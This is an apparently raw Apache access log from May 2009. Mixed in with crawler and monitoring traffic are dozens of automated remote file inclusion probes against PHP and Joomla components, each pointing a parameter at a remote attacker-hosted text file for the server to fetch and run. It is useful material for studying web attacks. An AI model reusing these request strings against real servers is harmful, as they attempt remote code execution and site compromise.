85.23.66.89 - - [30/May/2009:01:08:57 -0400] "GET /logs/access_log.Q109021200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:08:59 -0400] "GET /logs/access_log.Q109021400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:01 -0400] "GET /logs/access_log.Q109021900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:02 -0400] "GET /logs/access_log.Q109022200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:04 -0400] "GET /logs/access_log.Q109022600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:05 -0400] "GET /logs/access_log.Q109022800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:07 -0400] "GET /logs/access_log.Q109030200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:10 -0400] "GET /logs/access_log.Q109030400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:14 -0400] "GET /logs/access_log.Q109030800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:16 -0400] "GET /logs/access_log.Q109031300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:17 -0400] "GET /logs/access_log.Q109032500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:19 -0400] "GET /logs/error_log.Q108040500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:21 -0400] "GET /logs/error_log.Q108082000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:22 -0400] "GET /logs/error_log.Q108082600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:27 -0400] "GET /logs/error_log.Q108091300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:28 -0400] "GET /logs/error_log.Q108111300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:30 -0400] "GET /logs/error_log.Q108120200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:32 -0400] "GET /logs/error_log.Q108120700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:33 -0400] "GET /logs/error_log.Q108122500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:35 -0400] "GET /logs/error_log.Q109011400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
201.232.54.48 - - [30/May/2009:01:09:35 -0400] "GET /logs/access_log.Q109050300/index2.php?dir=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.23.66.89 - - [30/May/2009:01:09:36 -0400] "GET /logs/error_log.Q109021100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
85.23.66.89 - - [30/May/2009:01:09:38 -0400] "GET /logs/error_log.Q109021300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)"
74.208.111.178 - - [30/May/2009:01:10:04 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:01:10:10 -0400] "GET /logs/access_log.Q109051700//?path%5Bdocroot%5D=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:11:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [30/May/2009:01:11:57 -0400] "GET /errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:11:57 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:11:57 -0400] "GET /logs/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
74.52.2.130 - - [30/May/2009:01:12:00 -0400] "GET /logs/error_log.Q108122000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
64.182.124.1 - - [30/May/2009:01:12:04 -0400] "GET /errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:04 -0400] "GET /logs/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:04 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:16 -0400] "GET /errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:16 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:16 -0400] "GET /logs/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:37 -0400] "GET /logs/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:37 -0400] "GET /errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:38 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:01:12:42 -0400] "GET /logs/access_log.Q109052100/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:12:56 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:13:09 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:13:22 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
74.6.22.184 - - [30/May/2009:01:14:32 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.184 - - [30/May/2009:01:14:32 -0400] "GET /logs/error_log.Q108120800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.182.124.1 - - [30/May/2009:01:15:28 -0400] "GET /errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:15:28 -0400] "GET /logs/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:15:30 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:16:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [30/May/2009:01:17:26 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:18:22 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:18:22 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:18:22 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:18:29 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:18:34 -0400] "GET /logs/access_log.Q109050700%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:18:39 -0400] "GET /logs/access_log.Q109052200%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:01:20:20 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.0" 200 71817 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [30/May/2009:01:21:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.1 - - [30/May/2009:01:24:23 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
123.125.64.20 - - [30/May/2009:01:25:43 -0400] "GET /logs/access_log.Q108090300 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [30/May/2009:01:26:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.130.29.11 - - [30/May/2009:01:28:50 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [30/May/2009:01:28:50 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.130.29.11 - - [30/May/2009:01:28:51 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.7.201.86 - - [30/May/2009:01:28:57 -0400] "GET /logs/access_log.Q109021500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 291 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.7.201.86 - - [30/May/2009:01:28:57 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [30/May/2009:01:31:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.7.201.86 - - [30/May/2009:01:31:53 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:32:08 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:32:08 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:32:09 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.826"
85.10.128.219 - - [30/May/2009:01:32:40 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:32:40 -0400] "GET /logs/access_log.Q109050700/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.228.45.60 - - [30/May/2009:01:34:03 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/file_upload.php?sbp=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:01:34:03 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:01:34:03 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
216.120.237.150 - - [30/May/2009:01:34:37 -0400] "GET /logs/access_log.Q109052200/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:01:34:37 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:01:34:37 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
195.228.45.60 - - [30/May/2009:01:35:07 -0400] "GET /logs/access_log.Q109050700/components/com_simpleboard/file_upload.php?sbp=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:01:35:19 -0400] "GET /logs/error_log.Q108051600%20/include/lib.inc.php?site_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:01:35:20 -0400] "GET /include/lib.inc.php?site_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:01:35:20 -0400] "GET /logs/include/lib.inc.php?site_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:01:35:40 -0400] "GET /logs/access_log.Q109052200/components/com_simpleboard/file_upload.php?sbp=http://www.dirk-gerber.de/phpkit/content/download/MADONGCMD.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
121.130.29.11 - - [30/May/2009:01:36:22 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:36:25 -0400] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:36:25 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:36:25 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:36:25 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:36:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.107.3.73 - - [30/May/2009:01:36:34 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
64.182.124.1 - - [30/May/2009:01:37:06 -0400] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:07 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:07 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:09 -0400] "GET /logs/access_log.Q109052100%20%20//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
216.120.237.150 - - [30/May/2009:01:37:14 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
64.182.124.1 - - [30/May/2009:01:37:21 -0400] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:21 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:22 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:37:22 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
77.79.12.5 - - [30/May/2009:01:38:35 -0400] "GET /index.php?meio=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.7.201.86 - - [30/May/2009:01:38:55 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:40:34 -0400] "GET //admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.826"
81.92.97.90 - - [30/May/2009:01:40:49 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.92.97.90 - - [30/May/2009:01:40:49 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:41:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.7.201.86 - - [30/May/2009:01:41:49 -0400] "GET /logs/error_log.Q109022100//admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.7.201.86 - - [30/May/2009:01:41:49 -0400] "GET //admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 218 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.182.124.1 - - [30/May/2009:01:41:57 -0400] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:41:58 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:41:58 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:41:59 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
66.7.201.86 - - [30/May/2009:01:42:47 -0400] "GET /logs/error_log.Q109022100//admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:42:47 -0400] "GET //admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.826"
66.7.201.86 - - [30/May/2009:01:42:47 -0400] "GET /logs//admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.826"
216.120.237.150 - - [30/May/2009:01:43:05 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:01:43:15 -0400] "GET /logs/error_log.Q108051600/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
88.80.198.13 - - [30/May/2009:01:43:49 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:01:43:49 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:01:43:49 -0400] "GET /logs/access_log.Q109010700/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:01:44:59 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:01:45:00 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:01:45:00 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:45:16 -0400] "GET /logs/access_log.Q109051500%20%20//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:01:45:17 -0400] "GET /logs/access_log.Q109052100%20%20//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:01:45:31 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:01:45:31 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:01:45:32 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:01:46:27 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
